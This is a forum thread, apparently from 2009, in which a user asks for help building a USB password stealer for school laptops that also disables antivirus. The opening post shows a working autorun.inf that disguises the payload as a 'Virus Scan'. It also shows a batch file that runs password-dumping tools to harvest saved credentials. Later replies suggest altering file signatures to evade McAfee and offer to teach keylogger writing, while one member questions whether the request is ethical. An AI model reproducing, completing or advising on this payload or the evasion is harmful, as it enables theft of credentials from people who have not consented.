Help to make password stealer/anti-virus shutdown file

Discussion in 'Ethical hacking' started by Bursty, Apr 7, 2009.

  1. Bursty

    Bursty New Member

    Joined:
    Apr 7, 2009
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    0
    Hi guys,

    I need some helping make a .bat or .exe that steals peoples passwords when I insert my USB.

    Currently using:

    Code:
    [COLOR=#3333ff][autorun]
    open=launch.bat
    ACTION= Perform a Virus Scan[/COLOR]
    
    
    And
    Code:
    start mspass.exe /stext mspass.txt
    
    start mailpv.exe /stext mailpv.txt
    
    start iepv.exe /stext iepv.txt
    
    start pspv.exe /stext pspv.txt
    
    start passwordfox.exe /stext passwordfox.txt
    And then I added some anti-virus disable stuff into the .bat, but our laptops at school have McAfee anti-virus and it gets the files on my USB and deletes them on suspiscion.

    I was wondering if anyone could write me a script, that steals peoples passwords, and also disables their anti-virus first, without the .bat or .exe being detected in the first place and being deleted.

    Help Appreciated, Bursty
     
  2. fourthdimension

    fourthdimension New Member

    Joined:
    Jan 8, 2009
    Messages:
    144
    Likes Received:
    11
    Trophy Points:
    0
    Home Page:
    http://www.easygeek.org
    Why not just change the signatures of those files so they're not detected?
     
  3. indiansword

    indiansword Security Expert

    Joined:
    Oct 19, 2008
    Messages:
    491
    Likes Received:
    37
    Trophy Points:
    0
    Occupation:
    Operation Planner for 3 Australia
    Home Page:
    http://www.Secworm.net
    does this sound ETHICAL?

    aa aa.
     
  4. cpulocksmith

    cpulocksmith New Member

    Joined:
    Jul 23, 2008
    Messages:
    289
    Likes Received:
    5
    Trophy Points:
    0
    Occupation:
    student
    Location:
    canada
    Last edited: Apr 7, 2009
  5. fourthdimension

    fourthdimension New Member

    Joined:
    Jan 8, 2009
    Messages:
    144
    Likes Received:
    11
    Trophy Points:
    0
    Home Page:
    http://www.easygeek.org
    Nope. lol So I gave him enough information to answer his question, but he's still gonna have to go learn about hexing to get what he wants.
     
  6. Bursty

    Bursty New Member

    Joined:
    Apr 7, 2009
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    0
    Code:
    Why not just change the signatures of those files so they're not detected? 
    
    but he's still gonna have to go learn about hexing to get what he wants. 
    Are you able to write me up a .bat file and .inf with all this stuff in it? Or teach me what this is and how to do it?

    Thanks
     
  7. neo_vi

    neo_vi Member

    Joined:
    Feb 1, 2008
    Messages:
    720
    Likes Received:
    16
    Trophy Points:
    18
    Occupation:
    Software engineer
    Location:
    Earth
    Home Page:
    http://computertipaday.blogspot.com
    how to change the signature of a file. I know its by Hexing. But how to find the exact code and what to replace that with
     
  8. fourthdimension

    fourthdimension New Member

    Joined:
    Jan 8, 2009
    Messages:
    144
    Likes Received:
    11
    Trophy Points:
    0
    Home Page:
    http://www.easygeek.org
    http://ehsan.soltani.se/?p=57
     
  9. Hex00010

    Hex00010 New Member

    Joined:
    Jul 21, 2009
    Messages:
    31
    Likes Received:
    0
    Trophy Points:
    0
    First of all Why in the world would u even want to make a keylogger in a .bat If your going to send this to a network A.K.A school im pretty sure there system admin keeps a logs of all events on the system if one appears to yours and the admin sees it and takes a look at the .bat he can easily view the source

    Dont make it in VB best advice C# / C/C++ why not vb? You can easily decompile code in VB rather than c# C/c++ If you need help on creating one i wouldnt mind teaching you
     
  10. naimish

    naimish New Member

    Joined:
    Jun 29, 2009
    Messages:
    1,043
    Likes Received:
    18
    Trophy Points:
    0
    Occupation:
    Software Engineer
    Location:
    On Earth
    Hex00010, I would love to be taught :D
     

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice